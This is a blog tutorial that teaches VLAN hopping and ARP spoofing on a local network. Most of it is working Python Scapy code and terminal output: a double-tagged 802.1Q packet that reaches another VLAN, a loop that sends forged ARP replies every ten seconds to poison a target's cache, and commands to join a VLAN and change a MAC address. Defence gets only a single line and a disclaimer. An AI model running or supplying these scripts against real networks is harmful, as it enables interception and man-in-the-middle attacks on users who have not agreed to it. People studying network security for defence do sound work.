Code Your Own ARP Spoofing Over VLAN Hopping

Hacking Truth
0


 

Code Your Own ARP Spoofing Over VLAN Hopping

 

 

VLAN


A VLAN (Virtual Local Area Network) separates several networks on a logical base. Only devices on the same VLAN can see each other. VLANs where invented to define a networks structure independently from its physical hardware, to prioritize connections and to minimize broadcast traffic. They were not developed with security in mind, but its a common myth that VLANs can add to your security. Don’t rely on this myth, because several ways exist to circumvent the separation of a VLAN.


Switches implement VLANs in two different ways: through tagging of packets using a IEEE 802.1q Header. see the below image, that’s inserted after the Ethernet header or simply defined by port. 802.1q is a newer variant, which allows the creation of a VLAN spread over several switches.






VLAN Hopping


VLANs are no security feature as already mentioned, because the additional security of a modern, tagged VLAN on the one hand depends on a header added to the packet including the VLAN Id. Such a packet can be easily created with Scapy. Lets say our computer is connected to VLAN 1 and wants to ping another one on VLAN 2. 

 

#!/usr/bin/python

from scapy.all import *
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
Dot1Q(vlan=1) / \
Dot1Q(vlan=2) / \
IP(dst="192.168.13.23") / \
ICMP()
sendp(packet)

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan.py
.
Sent 1 packets.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan.py
.
Sent 1 packets.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$






First we set the header including our VLAN tag into the packet and afterwards the one of the destination host. The switch will remove the first tag, than decide how to react on the packet, seeing the second tag with VLAN Id 2 he decides to forward it to that vlan. On some switches this attack will only be successful if its connected to other VLAN enabled switches via stacking, because otherwise they
use port based VLAN.




Let’s Play Switch


Linux runs on a lot of embedded network devices; therefore it should not be surprising that one can turn their own computer into a full featured VLAN switch thanks to Linux. All you need is the tool vconfig. After installing the required



packet depending on your distribution you can add your host to another VLAN with the following command.

vconfig add eth0 1


Afterwards you must remember to start the new device and give it an IP address of the VLAN network!

ifconfig wlan0.2 192.168.13.23 up



 

 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig                   


wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 63482  bytes 39443272 (37.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 58826  bytes 15548253 (14.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo vconfig add wlan0 2   

Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo ifconfig wlan0.2 192.168.13.23 up  
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig                              


wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 64616  bytes 39837956 (37.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 60023  bytes 15811522 (15.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.23  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 726 (726.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$      



 

 

code with ARP Spoofing Over VLAN Hopping

 




ARP Spoofing Over VLAN Hopping


VLANs limit broadcast traffic to the ports belonging to the same VLAN therefore we cannot by default react to all ARP requests but have to proactively tell the victim our MAC every few seconds like seen in the first ARP spoofing example. The code is identical except for the fact that we tag every packet for our and than additionally for the destination VLAN.

 

#!/usr/bin/python

import time
from scapy.all import sendp, ARP, Ether, Dot1Q
iface = "wlan0"
target_ip = '192.168.13.23'
fake_ip = '192.168.13.5'
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1
target_vlan = 2
packet = Ether() / \
         Dot1Q(vlan=our_vlan) / \
         Dot1Q(vlan=target_vlan) / \
         ARP(hwsrc=fake_mac,
             pdst=target_ip,
             psrc=fake_ip,
             op="is-at")

while True:
     sendp(packet, iface=iface)
     time.sleep(10)


 

 

 
Luckily its not that complicated to protect against those kind of VLAN attacks: Just use physically divided switches if you really want to separate your networks!


 

 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan-hopping.py                                                                                                                                                    1 ⨯ 1 ⚙
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
^CTraceback (most recent call last):
  File "/home/hackerboy/Desktop/python/mymodule/vlan-hopping.py", line 20, in <module>
    time.sleep(10)
KeyboardInterrupt

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$

 

 

 

 If you want change MAC address of vlan (like wlan0.2) then you can use this command :- 

sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77

  • Wlan0.2 is our vlan interface.


 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig                                        

wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.23  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23  bytes 1692 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 



 


I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
 


 

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.
Post a Comment (0)
Our website uses cookies to enhance your experience. Learn More
Accept !